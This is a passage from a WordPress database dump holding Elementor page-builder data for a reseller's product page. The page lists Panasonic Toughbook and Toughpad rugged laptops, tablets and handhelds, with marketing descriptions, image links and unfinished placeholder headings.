e\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e414452\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0318f25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07cdd64\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"730c08e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9a3b9cc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ebdc4a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"cf2e3fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"375c2e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2a079e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a6cb494\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a926860\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faa365e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae37dad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aca729e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"697550c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d0e7f24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ff2d0d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e2f59f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3356,2606,'_elementor_version','0.4'),(3359,2607,'_elementor_edit_mode','builder'),(3360,2607,'_elementor_template_type','post'),(3361,2607,'_wp_page_template','template-fullwidth.php'),(3362,2607,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"justify\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e414452\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0318f25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07cdd64\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"730c08e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9a3b9cc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ebdc4a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"cf2e3fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"375c2e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2a079e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a6cb494\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid 